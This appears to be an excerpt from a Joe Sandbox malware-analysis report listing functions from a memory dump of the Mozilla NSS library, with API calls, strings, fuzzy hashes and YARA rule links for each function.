Instruction ID: 71e0825318dd53f8174048d375b6dddd4d4ccb9f033006e4d5dcb19ddafa6625
Opcode Fuzzy Hash: 7949a302088c2cc2da07f15015ff15d232f8221007545ae7c193c8f62696a3ff
Instruction Fuzzy Hash: B4110DF1B40340A6FB105AA46C85BFB3598DB4575DF080036ED0999B52F762D419C2FF

Function 6C6A2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6A2CDA,?,00000000), ref: 6C6A2E1E

Part of subcall function 6C6FFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C6A9003,?), ref: 6C6FFD91
Part of subcall function 6C6FFD80: PORT_Alloc_Util.NSS3(A4686C70,?), ref: 6C6FFDA2
Part of subcall function 6C6FFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C70,?,?), ref: 6C6FFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C6A2E33

Part of subcall function 6C6FFD80: free.MOZGLUE(00000000,?,?), ref: 6C6FFDD1

TlsGetValue.KERNEL32 ref: 6C6A2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C6A2E5E
PL_HashTableLookup.NSS3(?), ref: 6C6A2E71
PL_HashTableRemove.NSS3(?), ref: 6C6A2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C6A2E96
PR_Unlock.NSS3 ref: 6C6A2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6A2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6A2EC5

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 093e83f71f930148c86fb7943cced92c211b0046b7422ce3ec2e1fe346ee884f
Instruction ID: 25422d4d5c57191e8443e194df5c8b6a8db4838e8b04231cd6f8151c70627937
Opcode Fuzzy Hash: 093e83f71f930148c86fb7943cced92c211b0046b7422ce3ec2e1fe346ee884f
Instruction Fuzzy Hash: 8D213A72B40201A7DF201B65EC09A9B3B79EB5235DF044034ED1C82B11F732D9AAC6E9

Function 6C62CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C62B999), ref: 6C62CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C62B999), ref: 6C62D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C62B999), ref: 6C62D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C62B999), ref: 6C77972B

Strings

database corruption, xrefs: 6C62CFE7, 6C62D013, 6C62D028, 6C62D039, 6C62D03E, 6C779786
%s at line %d of [%.10s], xrefs: 6C62CFEC, 6C62D018, 6C62D029, 6C62D03F, 6C77978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C62CFDD, 6C62D00E, 6C62D022, 6C62D033, 6C779780

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 173b31d454ec920e35ce2cf969c6ddbd5f36bcb5311edc605c0f242af1f32b83
Instruction ID: 90bcb993f82f1208bafcd537ba68075076357ecf424d7b9cf1853d4427f51eae
Opcode Fuzzy Hash: 173b31d454ec920e35ce2cf969c6ddbd5f36bcb5311edc605c0f242af1f32b83
Instruction Fuzzy Hash: A0615A71A002149BD720CF29C900BA7B7F5EF95318F28816DE4499BB42D37AE947CBE5

Function 6C704DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C70536F,00000022,?,?,00000000,?), ref: 6C704E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C704F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C704F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C704FAE
free.MOZGLUE(?), ref: 6C704FC8

Strings

oSpl", xrefs: 6C704DFB, 6C704EF4, 6C704EC5
%s=%s, xrefs: 6C704F89
%s=%c%s%c, xrefs: 6C704FA9

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSpl"
API String ID: 2709355791-1959246084
Opcode ID: 4fc1581fced53f3404d896a84d87f53b24b13c13035d253a499325e85113650a
Instruction ID: e6b9924f2d5dbee8620b737ad068b91b9681464e3b5080819656385f829d6b14
Opcode Fuzzy Hash: 4fc1581fced53f3404d896a84d87f53b24b13c13035d253a499325e85113650a
Instruction Fuzzy Hash: E0517AF1B051458BEF01CA79CA907FF7BF9AF62308F288175E890A7B41D335A80597A1

Function 6C72EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C74A4A1,?,00000000,?,00000001), ref: 6C72EF6D

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

htonl.WSOCK32(00000000,?,6C74A4A1,?,00000000,?,00000001), ref: 6C72EFE4
htonl.WSOCK32(?,00000000,?,6C74A4A1,?,00000000,?,00000001), ref: 6C72EFF1
memcpy.VCRUNTIME140(?,?,6C74A4A1,?,00000000,?,6C74A4A1,?,00000000,?,00000001), ref: 6C72F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C74A4A1,?,00000000,?,00000001), ref: 6C72F027

Strings

dtls13, xrefs: 6C72EF33

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 3dc5e39c646f42160f35e892e0199618d021d3fdd1469d542f075d266724c11a
Instruction ID: a178238ea6982a0e5ecb70bc2acdf06b3b5f679ab8353b7f6f339986e0535223
Opcode Fuzzy Hash: 3dc5e39c646f42160f35e892e0199618d021d3fdd1469d542f075d266724c11a
Instruction Fuzzy Hash: BB311271A00218ABC720CF38DE84B8AB7E4EF49359F258039EC189B741E735E915CBE1

Function 6C6AAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6AAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7C9500,6C6A3F91), ref: 6C6AAFD2

Part of subcall function 6C6FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D18D0,?), ref: 6C6FB095

DER_GetInteger_Util.NSS3(?), ref: 6C6AB007

Part of subcall function 6C6F6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C6A1666,?,6C6AB00C,?), ref: 6C6F6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C6AB02F
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C6AB046
PL_FreeArenaPool.NSS3 ref: 6C6AB058
PL_FinishArenaPool.NSS3 ref: 6C6AB060

Strings

security, xrefs: 6C6AAFB8

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 750f5a879187fa228c5b6fa27f284d29fb14347fd8cc063d11c77a2e80c289b2
Instruction ID: 8efd52cace8f6bc0c47767f5eaedd6b6044a1b8365d2340b4dc6f6232cc9f604
Opcode Fuzzy Hash: 750f5a879187fa228c5b6fa27f284d29fb14347fd8cc063d11c77a2e80c289b2
Instruction Fuzzy Hash: 953169705043049BD7108F65DC45BAA77A4AFC632CF100618F8B45BBC1E332964AC79B

Function 6C6DACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C6DACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6DAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6DAD23

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6DAD39

Strings

n{l, xrefs: 6C6DAD51, 6C6DAD7B
C_MessageDecryptFinal, xrefs: 6C6DACE1
hSession = 0x%x, xrefs: 6C6DACFE, 6C6DAD0E
(CK_INVALID_HANDLE), xrefs: 6C6DAD1C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$n{l
API String ID: 332880674-2786337666
Opcode ID: a885b51a7c5079a8768a60bb854abc8bf4be6aef7a3d54147bec991a6e82fd6d
Instruction ID: 6742036773205a2f42538a11cea9b78ec140f606e0fa60bf1bc08c30d11e42b9
Opcode Fuzzy Hash: a885b51a7c5079a8768a60bb854abc8bf4be6aef7a3d54147bec991a6e82fd6d
Instruction Fuzzy Hash: 182149717041449FDB109F64DE8CBAA37B5EB4631EF054039E809A7A03DB34B908C7DA

Function 6C6ECC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C6ECD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C6ECE16
PR_SetError.NSS3(00000000,00000000), ref: 6C6ED079

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 07159b19954bfe1b94089aae559601684b0661858f6ba733d1a2212189ec1d33
Instruction ID: f1ddb9cd4f4792f1b46d59aa53cac3a62e8c48ea79d3e54d607bdcc2046a2d8c
Opcode Fuzzy Hash: 07159b19954bfe1b94089aae559601684b0661858f6ba733d1a2212189ec1d33
Instruction Fuzzy Hash: 42C1BFB1A052199BDB10CF24CC80BDABBB4BF4D318F1441A9D849A7741E771EE95CF98

Function 6C6A2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(1BD51D23), ref: 6C6A2C5D

Part of subcall function 6C700D30: calloc.MOZGLUE ref: 6C700D50
Part of subcall function 6C700D30: TlsGetValue.KERNEL32 ref: 6C700D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C6A2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6A2CE0

Part of subcall function 6C6A2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6A2CDA,?,00000000), ref: 6C6A2E1E
Part of subcall function 6C6A2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C6A2E33
Part of subcall function 6C6A2E00: TlsGetValue.KERNEL32 ref: 6C6A2E4E
Part of subcall function 6C6A2E00: EnterCriticalSection.KERNEL32(?), ref: 6C6A2E5E
Part of subcall function 6C6A2E00: PL_HashTableLookup.NSS3(?), ref: 6C6A2E71
Part of subcall function 6C6A2E00: PL_HashTableRemove.NSS3(?), ref: 6C6A2E84
Part of subcall function 6C6A2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C6A2E96
Part of subcall function 6C6A2E00: PR_Unlock.NSS3 ref: 6C6A2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C6A2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C6A2D3F
free.MOZGLUE(00000000), ref: 6C6A2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C6A2DB8
free.MOZGLUE ref: 6C6A2DC8

Part of subcall function 6C6A3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A3EC2
Part of subcall function 6C6A3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6A3ED6
Part of subcall function 6C6A3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6A3EEE
Part of subcall function 6C6A3E60: PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C6A3F02
Part of subcall function 6C6A3E60: PL_FreeArenaPool.NSS3 ref: 6C6A3F14
Part of subcall function 6C6A3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6A3F27

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: d74165d1b91320e6acfb38aed5d505c64d2c75d64a2fd16f3e9c837b23dee7ac
Instruction ID: dfc43fd2340210115617854944671b0224bb5028b24f63331b37dbfb8b9fc098
Opcode Fuzzy Hash: d74165d1b91320e6acfb38aed5d505c64d2c75d64a2fd16f3e9c837b23dee7ac
Instruction Fuzzy Hash: C751E171A443119BDB10AFA6DC89B5B77E5EF84308F14043CEC5983A12E731EC16CB9A

Function 6C63E890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C63E922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C63E9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C63EA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C63EB20
memcpy.VCRUNTIME140(?,?,?), ref: 6C63EB57

Strings

unknown column "%s" in foreign key definition, xrefs: 6C63ED18
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C63EDC2
foreign key on %s should reference only one column of table %T, xrefs: 6C63EE04

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: 004eb1b1da7a305337ac6868cf5c1ff8b66a845441f280d7fd70acdfc5acfdc4
Instruction ID: 456f4639a52c035ac82adf2918b4501b933efdb39e380f6d897d578fcb1c3925
Opcode Fuzzy Hash: 004eb1b1da7a305337ac6868cf5c1ff8b66a845441f280d7fd70acdfc5acfdc4
Instruction Fuzzy Hash: E0028E71E001298FDB05CF59C580AEEB7F2FF89308F296169D81AAB751D731AC01CBA4

Function 6C772F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C772FFD
sqlite3_initialize.NSS3 ref: 6C773007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C773032
sqlite3_mprintf.NSS3(6C7DAAF9,?), ref: 6C773073
sqlite3_free.NSS3(?), ref: 6C7730B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C7730C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C7730BB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 518c7a1c4740f3eb578cc3ee3ec2cce71eebe7c4ecad9694fce03ac76393025d
Instruction ID: 93c50ebf55944624a8ec79f626ef4fa25d601fa543314ca6f7c1fd13b5c3cd66
Opcode Fuzzy Hash: 518c7a1c4740f3eb578cc3ee3ec2cce71eebe7c4ecad9694fce03ac76393025d
Instruction Fuzzy Hash: 3541E271600A0AABDF10CF25C948A96B7A6FF44368F048639EC6987B40E731F955CBE1

Function 6C6B8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C6C124D,00000001), ref: 6C6B8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C6C124D,00000001), ref: 6C6B8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C6C124D,00000001), ref: 6C6B8D73
PR_Unlock.NSS3(?,?,?,?,?,6C6C124D,00000001), ref: 6C6B8D8C

Part of subcall function 6C74DD70: TlsGetValue.KERNEL32 ref: 6C74DD8C
Part of subcall function 6C74DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C74DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C6C124D,00000001), ref: 6C6B8DBA

Strings

KRAM, xrefs: 6C6B8CF9
KRAM, xrefs: 6C6B8D3E

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 95fad9b8b40eeb6a5a82400778d50fc31247af8b0265455a2d1b52e126aca0ac
Instruction ID: 8459442106e268482bbd6c09d80843ded8326365b6a69bf4686d37564fd9ffb0
Opcode Fuzzy Hash: 95fad9b8b40eeb6a5a82400778d50fc31247af8b0265455a2d1b52e126aca0ac
Instruction Fuzzy Hash: 4721D1B4A046028FCB00EF38C48859AB7F0FF59318F15897BD99897711D730D852CB95

Function 6C7B0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C7B0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C7B0EFA

Part of subcall function 6C69AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C69AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7B0F2B

Strings

Aborting, xrefs: 6C7B0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C7B0ED9, 6C7B0EE5, 6C7B0F06, 6C7B0F0B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 34885f51b737c19ad21225f86b408de6699f9781389fff47d316eeb262300b1c
Instruction ID: ed6d5f8458f3cbe52560393057b996810936510cce231324c590390b28943b6d
Opcode Fuzzy Hash: 34885f51b737c19ad21225f86b408de6699f9781389fff47d316eeb262300b1c
